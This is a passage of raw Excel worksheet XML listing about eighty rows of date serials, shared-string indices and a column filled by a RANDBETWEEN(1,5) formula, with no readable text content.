    <row r="23561" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A23561" s="1">
        <v>43013.474768518521</v>
      </c>
      <c r="C23561" t="s">
        <v>6</v>
      </c>
      <c r="D23561" t="s">
        <v>25</v>
      </c>
      <c r="E23561" s="2" t="s">
        <v>21326</v>
      </c>
      <c r="F23561">
        <f t="shared" ca="1" si="368"/>
        <v>2</v>
      </c>
    </row>
    <row r="23562" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23562" s="1">
        <v>43013.473738425928</v>
      </c>
      <c r="C23562" t="s">
        <v>10</v>
      </c>
      <c r="D23562" t="s">
        <v>1160</v>
      </c>
      <c r="E23562" t="s">
        <v>21327</v>
      </c>
      <c r="F23562">
        <f t="shared" ca="1" si="368"/>
        <v>3</v>
      </c>
    </row>
    <row r="23563" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23563" s="1">
        <v>43013.473692129628</v>
      </c>
      <c r="C23563" t="s">
        <v>10</v>
      </c>
      <c r="D23563" t="s">
        <v>1160</v>
      </c>
      <c r="E23563" t="s">
        <v>21327</v>
      </c>
      <c r="F23563">
        <f t="shared" ca="1" si="368"/>
        <v>3</v>
      </c>
    </row>
    <row r="23564" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A23564" s="1">
        <v>43013.432615740741</v>
      </c>
      <c r="C23564" t="s">
        <v>189</v>
      </c>
      <c r="E23564" s="2" t="s">
        <v>21328</v>
      </c>
      <c r="F23564">
        <f t="shared" ca="1" si="368"/>
        <v>3</v>
      </c>
    </row>
    <row r="23565" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23565" s="1">
        <v>43013.420532407406</v>
      </c>
      <c r="C23565" t="s">
        <v>10</v>
      </c>
      <c r="D23565" t="s">
        <v>23</v>
      </c>
      <c r="E23565" t="s">
        <v>21329</v>
      </c>
      <c r="F23565">
        <f t="shared" ca="1" si="368"/>
        <v>3</v>
      </c>
    </row>
    <row r="23566" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A23566" s="1">
        <v>43013.414444444446</v>
      </c>
      <c r="C23566" t="s">
        <v>65</v>
      </c>
      <c r="E23566" s="2" t="s">
        <v>21330</v>
      </c>
      <c r="F23566">
        <f t="shared" ca="1" si="368"/>
        <v>1</v>
      </c>
    </row>
    <row r="23567" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23567" s="1">
        <v>43013.404432870368</v>
      </c>
      <c r="C23567" t="s">
        <v>10</v>
      </c>
      <c r="D23567" t="s">
        <v>20</v>
      </c>
      <c r="E23567" t="s">
        <v>21331</v>
      </c>
      <c r="F23567">
        <f t="shared" ca="1" si="368"/>
        <v>4</v>
      </c>
    </row>
    <row r="23568" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23568" s="1">
        <v>43013.397916666669</v>
      </c>
      <c r="C23568" t="s">
        <v>10</v>
      </c>
      <c r="D23568" t="s">
        <v>89</v>
      </c>
      <c r="E23568" t="s">
        <v>21332</v>
      </c>
      <c r="F23568">
        <f t="shared" ca="1" si="368"/>
        <v>1</v>
      </c>
    </row>
    <row r="23569" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23569" s="1">
        <v>43013.395243055558</v>
      </c>
      <c r="C23569" t="s">
        <v>10</v>
      </c>
      <c r="D23569" t="s">
        <v>41</v>
      </c>
      <c r="E23569" t="s">
        <v>21333</v>
      </c>
      <c r="F23569">
        <f t="shared" ca="1" si="368"/>
        <v>5</v>
      </c>
    </row>
    <row r="23570" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A23570" s="1">
        <v>43013.394305555557</v>
      </c>
      <c r="C23570" t="s">
        <v>71</v>
      </c>
      <c r="D23570" t="s">
        <v>312</v>
      </c>
      <c r="E23570" s="2" t="s">
        <v>21334</v>
      </c>
      <c r="F23570">
        <f t="shared" ca="1" si="368"/>
        <v>5</v>
      </c>
    </row>
    <row r="23571" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A23571" s="1">
        <v>43013.375937500001</v>
      </c>
      <c r="C23571" t="s">
        <v>69</v>
      </c>
      <c r="E23571" s="2" t="s">
        <v>21335</v>
      </c>
      <c r="F23571">
        <f t="shared" ca="1" si="368"/>
        <v>4</v>
      </c>
    </row>
    <row r="23572" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23572" s="1">
        <v>43013.355057870373</v>
      </c>
      <c r="C23572" t="s">
        <v>6</v>
      </c>
      <c r="D23572" t="s">
        <v>25</v>
      </c>
      <c r="E23572" t="s">
        <v>21336</v>
      </c>
      <c r="F23572">
        <f t="shared" ca="1" si="368"/>
        <v>4</v>
      </c>
    </row>
    <row r="23573" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23573" s="1">
        <v>43013.354756944442</v>
      </c>
      <c r="C23573" t="s">
        <v>65</v>
      </c>
      <c r="E23573" s="2" t="s">
        <v>21337</v>
      </c>
      <c r="F23573">
        <f t="shared" ca="1" si="368"/>
        <v>2</v>
      </c>
    </row>
    <row r="23574" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A23574" s="1">
        <v>43013.333541666667</v>
      </c>
      <c r="C23574" t="s">
        <v>103</v>
      </c>
      <c r="E23574" s="2" t="s">
        <v>21338</v>
      </c>
      <c r="F23574">
        <f t="shared" ca="1" si="368"/>
        <v>2</v>
      </c>
    </row>
    <row r="23575" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23575" s="1">
        <v>43013.291122685187</v>
      </c>
      <c r="C23575" t="s">
        <v>173</v>
      </c>
      <c r="E23575" s="2" t="s">
        <v>21339</v>
      </c>
      <c r="F23575">
        <f t="shared" ca="1" si="368"/>
        <v>2</v>
      </c>
    </row>
    <row r="23576" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23576" s="1">
        <v>43013.290520833332</v>
      </c>
      <c r="C23576" t="s">
        <v>124</v>
      </c>
      <c r="E23576" s="2" t="s">
        <v>21340</v>
      </c>
      <c r="F23576">
        <f t="shared" ca="1" si="368"/>
        <v>4</v>
      </c>
    </row>
    <row r="23577" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23577" s="1">
        <v>43013.287569444445</v>
      </c>
      <c r="C23577" t="s">
        <v>229</v>
      </c>
      <c r="E23577" t="s">
        <v>21341</v>
      </c>
      <c r="F23577">
        <f t="shared" ca="1" si="368"/>
        <v>4</v>
      </c>
    </row>
    <row r="23578" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23578" s="1">
        <v>43013.268854166665</v>
      </c>
      <c r="C23578" t="s">
        <v>41</v>
      </c>
      <c r="E23578" t="s">
        <v>21342</v>
      </c>
      <c r="F23578">
        <f t="shared" ca="1" si="368"/>
        <v>4</v>
      </c>
    </row>
    <row r="23579" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23579" s="1">
        <v>43013.261793981481</v>
      </c>
      <c r="C23579" t="s">
        <v>173</v>
      </c>
      <c r="E23579" s="2" t="s">
        <v>21339</v>
      </c>
      <c r="F23579">
        <f t="shared" ca="1" si="368"/>
        <v>4</v>
      </c>
    </row>
    <row r="23580" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23580" s="1">
        <v>43013.256574074076</v>
      </c>
      <c r="C23580" t="s">
        <v>173</v>
      </c>
      <c r="E23580" s="2" t="s">
        <v>21339</v>
      </c>
      <c r="F23580">
        <f t="shared" ca="1" si="368"/>
        <v>4</v>
      </c>
    </row>
    <row r="23581" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23581" s="1">
        <v>43013.234837962962</v>
      </c>
      <c r="C23581" t="s">
        <v>9575</v>
      </c>
      <c r="D23581" t="s">
        <v>367</v>
      </c>
      <c r="E23581" s="2" t="s">
        <v>21343</v>
      </c>
      <c r="F23581">
        <f t="shared" ca="1" si="368"/>
        <v>1</v>
      </c>
    </row>
    <row r="23582" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23582" s="1">
        <v>43013.218680555554</v>
      </c>
      <c r="C23582" t="s">
        <v>69</v>
      </c>
      <c r="E23582" s="2" t="s">
        <v>21344</v>
      </c>
      <c r="F23582">
        <f t="shared" ca="1" si="368"/>
        <v>4</v>
      </c>
    </row>
    <row r="23583" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23583" s="1">
        <v>43013.216481481482</v>
      </c>
      <c r="C23583" t="s">
        <v>344</v>
      </c>
      <c r="E23583" t="s">
        <v>21345</v>
      </c>
      <c r="F23583">
        <f t="shared" ca="1" si="368"/>
        <v>1</v>
      </c>
    </row>
    <row r="23584" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A23584" s="1">
        <v>43013.210972222223</v>
      </c>
      <c r="C23584" t="s">
        <v>71</v>
      </c>
      <c r="E23584" s="2" t="s">
        <v>21346</v>
      </c>
      <c r="F23584">
        <f t="shared" ca="1" si="368"/>
        <v>1</v>
      </c>
    </row>
    <row r="23585" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23585" s="1">
        <v>43013.19902777778</v>
      </c>
      <c r="C23585" t="s">
        <v>41</v>
      </c>
      <c r="E23585" t="s">
        <v>21347</v>
      </c>
      <c r="F23585">
        <f t="shared" ca="1" si="368"/>
        <v>5</v>
      </c>
    </row>
    <row r="23586" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23586" s="1">
        <v>43013.167025462964</v>
      </c>
      <c r="C23586" t="s">
        <v>776</v>
      </c>
      <c r="E23586" t="s">
        <v>21348</v>
      </c>
      <c r="F23586">
        <f t="shared" ca="1" si="368"/>
        <v>1</v>
      </c>
    </row>
    <row r="23587" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A23587" s="1">
        <v>43013.159143518518</v>
      </c>
      <c r="C23587" t="s">
        <v>103</v>
      </c>
      <c r="E23587" s="2" t="s">
        <v>21349</v>
      </c>
      <c r="F23587">
        <f t="shared" ca="1" si="368"/>
        <v>2</v>
      </c>
    </row>
    <row r="23588" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A23588" s="1">
        <v>43013.1484837963</v>
      </c>
      <c r="C23588" t="s">
        <v>48</v>
      </c>
      <c r="E23588" s="2" t="s">
        <v>21350</v>
      </c>
      <c r="F23588">
        <f t="shared" ca="1" si="368"/>
        <v>1</v>
      </c>
    </row>
    <row r="23589" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A23589" s="1">
        <v>43013.136018518519</v>
      </c>
      <c r="C23589" t="s">
        <v>71</v>
      </c>
      <c r="D23589" t="s">
        <v>312</v>
      </c>
      <c r="E23589" s="2" t="s">
        <v>21351</v>
      </c>
      <c r="F23589">
        <f t="shared" ca="1" si="368"/>
        <v>2</v>
      </c>
    </row>
    <row r="23590" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A23590" s="1">
        <v>43013.119849537034</v>
      </c>
      <c r="C23590" t="s">
        <v>559</v>
      </c>
      <c r="D23590" t="s">
        <v>6</v>
      </c>
      <c r="E23590" s="2" t="s">
        <v>21352</v>
      </c>
      <c r="F23590">
        <f t="shared" ca="1" si="368"/>
        <v>3</v>
      </c>
    </row>
    <row r="23591" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23591" s="1">
        <v>43013.1171875</v>
      </c>
      <c r="C23591" t="s">
        <v>118</v>
      </c>
      <c r="F23591">
        <f t="shared" ca="1" si="368"/>
        <v>1</v>
      </c>
    </row>
    <row r="23592" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23592" s="1">
        <v>43013.038726851853</v>
      </c>
      <c r="C23592" t="s">
        <v>41</v>
      </c>
      <c r="E23592" t="s">
        <v>21353</v>
      </c>
      <c r="F23592">
        <f t="shared" ca="1" si="368"/>
        <v>3</v>
      </c>
    </row>
    <row r="23593" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23593" s="1">
        <v>43013.000567129631</v>
      </c>
      <c r="C23593" t="s">
        <v>140</v>
      </c>
      <c r="D23593" t="s">
        <v>141</v>
      </c>
      <c r="E23593" t="s">
        <v>21354</v>
      </c>
      <c r="F23593">
        <f t="shared" ca="1" si="368"/>
        <v>1</v>
      </c>
    </row>
    <row r="23594" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A23594" s="1">
        <v>43012.985312500001</v>
      </c>
      <c r="C23594" t="s">
        <v>140</v>
      </c>
      <c r="D23594" t="s">
        <v>46</v>
      </c>
      <c r="E23594" s="2" t="s">
        <v>21355</v>
      </c>
      <c r="F23594">
        <f t="shared" ca="1" si="368"/>
        <v>2</v>
      </c>
    </row>
    <row r="23595" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23595" s="1">
        <v>43012.975902777776</v>
      </c>
      <c r="C23595" t="s">
        <v>10</v>
      </c>
      <c r="D23595" t="s">
        <v>36</v>
      </c>
      <c r="E23595" s="2" t="s">
        <v>21356</v>
      </c>
      <c r="F23595">
        <f t="shared" ca="1" si="368"/>
        <v>4</v>
      </c>
    </row>
    <row r="23596" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A23596" s="1">
        <v>43012.913148148145</v>
      </c>
      <c r="C23596" t="s">
        <v>173</v>
      </c>
      <c r="D23596" t="s">
        <v>178</v>
      </c>
      <c r="E23596" s="2" t="s">
        <v>21357</v>
      </c>
      <c r="F23596">
        <f t="shared" ca="1" si="368"/>
        <v>4</v>
      </c>
    </row>
    <row r="23597" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A23597" s="1">
        <v>43012.84584490741</v>
      </c>
      <c r="C23597" t="s">
        <v>10</v>
      </c>
      <c r="D23597" t="s">
        <v>46</v>
      </c>
      <c r="E23597" s="2" t="s">
        <v>21358</v>
      </c>
      <c r="F23597">
        <f t="shared" ca="1" si="368"/>
        <v>2</v>
      </c>
    </row>
    <row r="23598" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23598" s="1">
        <v>43012.795555555553</v>
      </c>
      <c r="C23598" t="s">
        <v>10</v>
      </c>
      <c r="D23598" t="s">
        <v>46</v>
      </c>
      <c r="E23598" t="s">
        <v>21359</v>
      </c>
      <c r="F23598">
        <f t="shared" ca="1" si="368"/>
        <v>2</v>
      </c>
    </row>
    <row r="23599" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A23599" s="1">
        <v>43012.790925925925</v>
      </c>
      <c r="C23599" t="s">
        <v>10</v>
      </c>
      <c r="D23599" t="s">
        <v>11</v>
      </c>
      <c r="E23599" s="2" t="s">
        <v>21360</v>
      </c>
      <c r="F23599">
        <f t="shared" ca="1" si="368"/>
        <v>5</v>
      </c>
    </row>
    <row r="23600" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23600" s="1">
        <v>43012.755532407406</v>
      </c>
      <c r="C23600" t="s">
        <v>10</v>
      </c>
      <c r="D23600" t="s">
        <v>80</v>
      </c>
      <c r="E23600" t="s">
        <v>21361</v>
      </c>
      <c r="F23600">
        <f t="shared" ca="1" si="368"/>
        <v>1</v>
      </c>
    </row>
    <row r="23601" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23601" s="1">
        <v>43012.717627314814</v>
      </c>
      <c r="C23601" t="s">
        <v>10</v>
      </c>
      <c r="D23601" t="s">
        <v>89</v>
      </c>
      <c r="E23601" t="s">
        <v>21362</v>
      </c>
      <c r="F23601">
        <f t="shared" ca="1" si="368"/>
        <v>4</v>
      </c>
    </row>
    <row r="23602" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A23602" s="1">
        <v>43012.712557870371</v>
      </c>
      <c r="C23602" t="s">
        <v>16</v>
      </c>
      <c r="E23602" s="2" t="s">
        <v>21363</v>
      </c>
      <c r="F23602">
        <f t="shared" ca="1" si="368"/>
        <v>3</v>
      </c>
    </row>
    <row r="23603" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23603" s="1">
        <v>43012.707812499997</v>
      </c>
      <c r="C23603" t="s">
        <v>10</v>
      </c>
      <c r="D23603" t="s">
        <v>6</v>
      </c>
      <c r="E23603" t="s">
        <v>21364</v>
      </c>
      <c r="F23603">
        <f t="shared" ca="1" si="368"/>
        <v>4</v>
      </c>
    </row>
    <row r="23604" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23604" s="1">
        <v>43012.674733796295</v>
      </c>
      <c r="C23604" t="s">
        <v>10</v>
      </c>
      <c r="D23604" t="s">
        <v>41</v>
      </c>
      <c r="E23604" t="s">
        <v>21365</v>
      </c>
      <c r="F23604">
        <f t="shared" ca="1" si="368"/>
        <v>4</v>
      </c>
    </row>
    <row r="23605" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23605" s="1">
        <v>43012.651678240742</v>
      </c>
      <c r="C23605" t="s">
        <v>10</v>
      </c>
      <c r="D23605" t="s">
        <v>89</v>
      </c>
      <c r="E23605" t="s">
        <v>21366</v>
      </c>
      <c r="F23605">
        <f t="shared" ca="1" si="368"/>
        <v>3</v>
      </c>
    </row>
    <row r="23606" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23606" s="1">
        <v>43012.647650462961</v>
      </c>
      <c r="C23606" t="s">
        <v>10</v>
      </c>
      <c r="D23606" t="s">
        <v>80</v>
      </c>
      <c r="E23606" t="s">
        <v>21367</v>
      </c>
      <c r="F23606">
        <f t="shared" ca="1" si="368"/>
        <v>2</v>
      </c>
    </row>
    <row r="23607" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23607" s="1">
        <v>43012.60765046296</v>
      </c>
      <c r="C23607" t="s">
        <v>6</v>
      </c>
      <c r="D23607" t="s">
        <v>194</v>
      </c>
      <c r="E23607" t="s">
        <v>21368</v>
      </c>
      <c r="F23607">
        <f t="shared" ca="1" si="368"/>
        <v>1</v>
      </c>
    </row>
    <row r="23608" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23608" s="1">
        <v>43012.60229166667</v>
      </c>
      <c r="C23608" t="s">
        <v>10</v>
      </c>
      <c r="D23608" t="s">
        <v>232</v>
      </c>
      <c r="E23608" t="s">
        <v>21369</v>
      </c>
      <c r="F23608">
        <f t="shared" ca="1" si="368"/>
        <v>4</v>
      </c>
    </row>
    <row r="23609" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23609" s="1">
        <v>43012.60229166667</v>
      </c>
      <c r="C23609" t="s">
        <v>10</v>
      </c>
      <c r="D23609" t="s">
        <v>232</v>
      </c>
      <c r="E23609" t="s">
        <v>21369</v>
      </c>
      <c r="F23609">
        <f t="shared" ca="1" si="368"/>
        <v>4</v>
      </c>
    </row>
    <row r="23610" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23610" s="1">
        <v>43012.594629629632</v>
      </c>
      <c r="C23610" t="s">
        <v>10</v>
      </c>
      <c r="D23610" t="s">
        <v>94</v>
      </c>
      <c r="E23610" t="s">
        <v>21370</v>
      </c>
      <c r="F23610">
        <f t="shared" ca="1" si="368"/>
        <v>5</v>
      </c>
    </row>
    <row r="23611" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23611" s="1">
        <v>43012.581145833334</v>
      </c>
      <c r="C23611" t="s">
        <v>10</v>
      </c>
      <c r="D23611" t="s">
        <v>6</v>
      </c>
      <c r="E23611" t="s">
        <v>21371</v>
      </c>
      <c r="F23611">
        <f t="shared" ca="1" si="368"/>
        <v>1</v>
      </c>
    </row>
    <row r="23612" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23612" s="1">
        <v>43012.578738425924</v>
      </c>
      <c r="C23612" t="s">
        <v>6</v>
      </c>
      <c r="D23612" t="s">
        <v>25</v>
      </c>
      <c r="F23612">
        <f t="shared" ca="1" si="368"/>
        <v>5</v>
      </c>
    </row>
    <row r="23613" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23613" s="1">
        <v>43012.576296296298</v>
      </c>
      <c r="C23613" t="s">
        <v>6</v>
      </c>
      <c r="D23613" t="s">
        <v>25</v>
      </c>
      <c r="F23613">
        <f t="shared" ca="1" si="368"/>
        <v>4</v>
      </c>
    </row>
    <row r="23614" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23614" s="1">
        <v>43012.575023148151</v>
      </c>
      <c r="C23614" t="s">
        <v>6</v>
      </c>
      <c r="D23614" t="s">
        <v>25</v>
      </c>
      <c r="F23614">
        <f t="shared" ca="1" si="368"/>
        <v>2</v>
      </c>
    </row>
    <row r="23615" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23615" s="1">
        <v>43012.571550925924</v>
      </c>
      <c r="C23615" t="s">
        <v>6</v>
      </c>
      <c r="D23615" t="s">
        <v>25</v>
      </c>
      <c r="F23615">
        <f t="shared" ca="1" si="368"/>
        <v>5</v>
      </c>
    </row>
    <row r="23616" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23616" s="1">
        <v>43012.569930555554</v>
      </c>
      <c r="C23616" t="s">
        <v>6</v>
      </c>
      <c r="D23616" t="s">
        <v>25</v>
      </c>
      <c r="F23616">
        <f t="shared" ca="1" si="368"/>
        <v>3</v>
      </c>
    </row>
    <row r="23617" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A23617" s="1">
        <v>43012.562488425923</v>
      </c>
      <c r="C23617" t="s">
        <v>10</v>
      </c>
      <c r="E23617" s="2" t="s">
        <v>21372</v>
      </c>
      <c r="F23617">
        <f t="shared" ca="1" si="368"/>
        <v>4</v>
      </c>
    </row>
    <row r="23618" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23618" s="1">
        <v>43012.556909722225</v>
      </c>
      <c r="C23618" t="s">
        <v>6</v>
      </c>
      <c r="D23618" t="s">
        <v>25</v>
      </c>
      <c r="F23618">
        <f t="shared" ref="F23618:F23681" ca="1" si="369">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="23619" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23619" s="1">
        <v>43012.554976851854</v>
      </c>
      <c r="C23619" t="s">
        <v>6</v>
      </c>
      <c r="D23619" t="s">
        <v>25</v>
      </c>
      <c r="E23619" t="s">
        <v>1920</v>
      </c>
      <c r="F23619">
        <f t="shared" ca="1" si="369"/>
        <v>4</v>
      </c>
    </row>
    <row r="23620" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23620" s="1">
        <v>43012.55201388889</v>
      </c>
      <c r="C23620" t="s">
        <v>10</v>
      </c>
      <c r="D23620" t="s">
        <v>271</v>
      </c>
      <c r="E23620" s="2" t="s">
        <v>21373</v>
      </c>
      <c r="F23620">
        <f t="shared" ca="1" si="369"/>
        <v>3</v>
      </c>
    </row>
    <row r="23621" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A23621" s="1">
        <v>43012.546400462961</v>
      </c>
      <c r="C23621" t="s">
        <v>10</v>
      </c>
      <c r="D23621" t="s">
        <v>244</v>
      </c>
      <c r="E23621" s="2" t="s">
        <v>21374</v>
      </c>
      <c r="F23621">
        <f t="shared" ca="1" si="369"/>
        <v>5</v>
      </c>
    </row>
    <row r="23622" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23622" s="1">
        <v>43012.545370370368</v>
      </c>
      <c r="C23622" t="s">
        <v>10</v>
      </c>
      <c r="D23622" t="s">
        <v>33</v>
      </c>
      <c r="E23622" t="s">
        <v>21375</v>
      </c>
      <c r="F23622">
        <f t="shared" ca="1" si="369"/>
        <v>4</v>
      </c>
    </row>
    <row r="23623" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A23623" s="1">
        <v>43012.532951388886</v>
      </c>
      <c r="C23623" t="s">
        <v>10</v>
      </c>
      <c r="D23623" t="s">
        <v>112</v>
      </c>
      <c r="E23623" s="2" t="s">
        <v>21376</v>
      </c>
      <c r="F23623">
        <f t="shared" ca="1" si="369"/>
        <v>1</v>
      </c>
    </row>
    <row r="23624" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23624" s="1">
        <v>43012.531574074077</v>
      </c>
      <c r="C23624" t="s">
        <v>16</v>
      </c>
      <c r="E23624" t="s">
        <v>21377</v>
      </c>
      <c r="F23624">
        <f t="shared" ca="1" si="369"/>
        <v>4</v>
      </c>
    </row>
    <row r="23625" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23625" s="1">
        <v>43012.523125</v>
      </c>
      <c r="C23625" t="s">
        <v>48</v>
      </c>
      <c r="E23625" t="s">
        <v>21378</v>
      </c>
      <c r="F23625">
        <f t="shared" ca="1" si="369"/>
        <v>4</v>
      </c>
    </row>
    <row r="23626" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23626" s="1">
        <v>43012.513993055552</v>
      </c>
      <c r="C23626" t="s">
        <v>10</v>
      </c>
      <c r="D23626" t="s">
        <v>52</v>
      </c>
      <c r="E23626" t="s">
        <v>21379</v>
      </c>
      <c r="F23626">
        <f t="shared" ca="1" si="369"/>
        <v>4</v>
      </c>
    </row>
    <row r="23627" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23627" s="1">
        <v>43012.499907407408</v>
      </c>
      <c r="C23627" t="s">
        <v>10</v>
      </c>
      <c r="D23627" t="s">
        <v>271</v>
      </c>
      <c r="E23627" t="s">
        <v>21380</v>
      </c>
      <c r="F23627">
        <f t="shared" ca="1" si="369"/>
        <v>2</v>
      </c>
    </row>
    <row r="23628" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A23628" s="1">
        <v>43012.497384259259</v>
      </c>
      <c r="C23628" t="s">
        <v>355</v>
      </c>
      <c r="D23628" t="s">
        <v>1993</v>
      </c>
      <c r="E23628" s="2" t="s">
        <v>21381</v>
      </c>
      <c r="F23628">
        <f t="shared" ca="1" si="369"/>
        <v>4</v>
      </c>
    </row>
    <row r="23629" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A23629" s="1">
        <v>43012.476423611108</v>
      </c>
      <c r="C23629" t="s">
        <v>65</v>
      </c>
      <c r="E23629" s="2" t="s">
        <v>21382</v>
      </c>
      <c r="F23629">
        <f t="shared" ca="1" si="369"/>
        <v>5</v>
      </c>
    </row>
    <row r="23630" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23630" s="1">
        <v>43012.470196759263</v>
      </c>
      <c r="C23630" t="s">
        <v>10</v>
      </c>
      <c r="D23630" t="s">
        <v>52</v>
      </c>
      <c r="E23630" t="s">
        <v>21383</v>
      </c>
      <c r="F23630">
        <f t="shared" ca="1" si="369"/>
        <v>5</v>
      </c>
    </row>
    <row r="23631" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A23631" s="1">
        <v>43012.458437499998</v>
      </c>
      <c r="C23631" t="s">
        <v>10</v>
      </c>
      <c r="D23631" t="s">
        <v>107</v>
      </c>
      <c r="E23631" s="2" t="s">
        <v>21384</v>
      </c>
      <c r="F23631">
        <f t="shared" ca="1" si="369"/>
        <v>4</v>
      </c>
    </row>
    <row r="23632" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23632" s="1">
        <v>43012.45653935185</v>
      </c>
      <c r="C23632" t="s">
        <v>10</v>
      </c>
      <c r="D23632" t="s">
        <v>20</v>
      </c>
      <c r="E23632" t="s">
        <v>21385</v>
      </c>
      <c r="F23632">
        <f t="shared" ca="1" si="369"/>
        <v>4</v>
      </c>
    </row>
    <row r="23633" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23633" s="1">
        <v>43012.447384259256</v>
      </c>
      <c r="C23633" t="s">
        <v>10</v>
      </c>
      <c r="D23633" t="s">
        <v>381</v>
      </c>
      <c r="E23633" t="s">
        <v>21386</v>
      </c>
      <c r="F23633">
        <f t="shared" ca="1" si="369"/>
        <v>4</v>
      </c>
    </row>
    <row r="23634" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A23634" s="1">
        <v>43012.447291666664</v>
      </c>
      <c r="C23634" t="s">
        <v>10</v>
      </c>
      <c r="D23634" t="s">
        <v>229</v>
      </c>
      <c r="E23634" s="2" t="s">
        <v>21387</v>
      </c>
      <c r="F23634">
        <f t="shared" ca="1" si="369"/>
        <v>1</v>
      </c>
    </row>
    <row r="23635" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23635" s="1">
        <v>43012.435243055559</v>
      </c>
      <c r="C23635" t="s">
        <v>41</v>
      </c>
      <c r="E23635" t="s">
        <v>21388</v>
      </c>
      <c r="F23635">
        <f t="shared" ca="1" si="369"/>
        <v>2</v>
      </c>
    </row>
    <row r="23636" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A23636" s="1">
        <v>43012.430949074071</v>
      </c>
      <c r="C23636" t="s">
        <v>6</v>
      </c>
      <c r="D23636" t="s">
        <v>25</v>
      </c>
      <c r="E23636" s="2" t="s">
        <v>21389</v>
      </c>
      <c r="F23636">
        <f t="shared" ca="1" si="369"/>
        <v>5</v>
      </c>
    </row>
    <row r="23637" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A23637" s="1">
        <v>43012.414895833332</v>
      </c>
      <c r="C23637" t="s">
        <v>10</v>
      </c>
      <c r="D23637" t="s">
        <v>1036</v>
      </c>
      <c r="E23637" s="2" t="s">
        <v>21390</v>
      </c>
      <c r="F23637">
        <f t="shared" ca="1" si="369"/>
        <v>4</v>
      </c>
    </row>
    <row r="23638" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23638" s="1">
        <v>43012.400393518517</v>
      </c>
      <c r="C23638" t="s">
        <v>10</v>
      </c>
      <c r="D23638" t="s">
        <v>107</v>
      </c>
      <c r="E23638" t="s">
        <v>21391</v>
      </c>
      <c r="F23638">
        <f t="shared" ca="1" si="369"/>
        <v>4</v>
      </c>
    </row>
    <row r="23639" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23639" s="1">
        <v>43012.391134259262</v>
      </c>
